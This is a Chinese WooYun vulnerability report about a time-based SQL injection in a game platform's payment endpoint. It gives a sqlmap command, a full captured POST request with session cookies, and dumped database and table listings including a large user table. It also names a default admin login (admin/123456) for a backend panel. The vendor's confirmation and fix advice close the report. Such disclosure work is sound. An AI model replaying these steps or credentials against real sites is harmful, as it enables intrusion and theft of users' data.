乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-28: 细节已通知厂商并且等待厂商处理中 2016-04-28: 厂商已经确认,细节仅向厂商公开 2016-05-08: 细节向核心白帽子及相关领域专家公开 2016-05-18: 细节向普通白帽子公开 2016-05-28: 细节向实习白帽子公开 2016-06-12: 细节向公众公开
RT
post注入语法:sqlmap.py -r 1.txt --dbs 注入参数sid====================post数据包=======================POST /index.php?c=pay&a=testgamerole HTTP/1.1Host: wan.40407.comProxy-Connection: keep-aliveContent-Length: 36Accept: */*Origin: http://wan.40407.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://wan.40407.com/index.php?c=pay&pt=ptAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3Dusername=heise123&gid=5&sid=32&isyk=
数据库信息
available databases [25]:[*] `14x`[*] `399wantg`[*] `40407box_test`[*] `40407box`[*] `40407boxpt_test`[*] `40407boxpt`[*] `40407boxstat`[*] `40407data`[*] `40407kfz`[*] `40407lol`[*] `40407tqyt`[*] `dkwdv{`[*] `kp.ya58.cn`[*] `s}\x1a!\x03!`[*] `ucentir)\x11`[*] `xiro7!`[*] bcgua[*] information_schema[*] mysql[*] percona[*] performance_schema[*] projeit[*] smweb[*] testcy[*] tuan
当前库表信息
Database: 40407boxpt+----------------------+---------+| Table | Entries |+----------------------+---------+| box_game_tg_data | 761184 || box_game_member | 450339 || box_gamecard_sn | 280019 || box_pay | 22280 || box_score_record | 4632 || box_score_playinfo | 4016 || box_member_mac | 3041 || box_content_1 | 2220 || box_content_1_extend | 1900 || box_score_rule | 1306 || box_pk_username | 1074 || box_game_server | 650 || box_content_1_item | 576 || box_jf_pay | 479 || box_tag | 236 || box_admin_user | 227 || box_score_game | 160 || box_content_1_sjsg | 139 || box_score_pay | 139 || box_category | 131 || box_content_1_jjsg | 125 || box_content_1_sjtl | 90 || box_content_1_hero | 67 || box_content_1_zwx | 67 || box_content_1_nslm | 55 || box_model | 35 || box_model_field | 35 || box_game | 34 || box_content_1_rxsg2 | 32 || box_content_1_jyjh | 29 || box_content_1_ocean | 26 || box_content_1_hwsg | 25 || box_content_1_mycs | 25 || box_user_tg | 24 || box_pay_cycle | 23 || box_linkage | 18 || box_ad | 16 || box_content_1_jyjx | 16 || box_pk_game | 13 || box_pk_number | 13 || box_content | 12 || box_gid_modelid | 10 || box_pingtaibi_fanli | 10 || box_pk_rule | 10 || box_content_1_bztx | 8 || box_plugin | 6 || box_content_1_smzt | 5 || box_member_group | 5 || box_admin_group | 4 || box_content_1_jz | 4 || box_content_1_rxsg | 4 || box_role | 4 || box_content_1_mjll | 3 || box_wan_top_gg | 3 || box_content_1_dsg | 2 || box_content_1_game | 2 || box_content_1_swydn | 2 || box_content_1_xbjz | 2 |+----------------------+---------+-------------------------------------Database: 40407boxpt 45w用户信息+-----------------+---------+| Table | Entries |+-----------------+---------+| box_game_member | 450339 |+-----------------+---------+20多万估计卡密信息吧 70多w什么信息的 支付信息等
由于是延迟注入这里就不跑数据信息证明了======================================================================
http://tg.40407.com/admin/mainindex/index admin 123456 进入
可以修改游戏的推广信息啦
一些用户信息
过滤 加强密码
危害等级:中
漏洞Rank:10
确认时间:2016-04-28 10:54
谢谢,参数过滤的还是要加强处理,平台没上线内部测试结果没修改密码……
暂无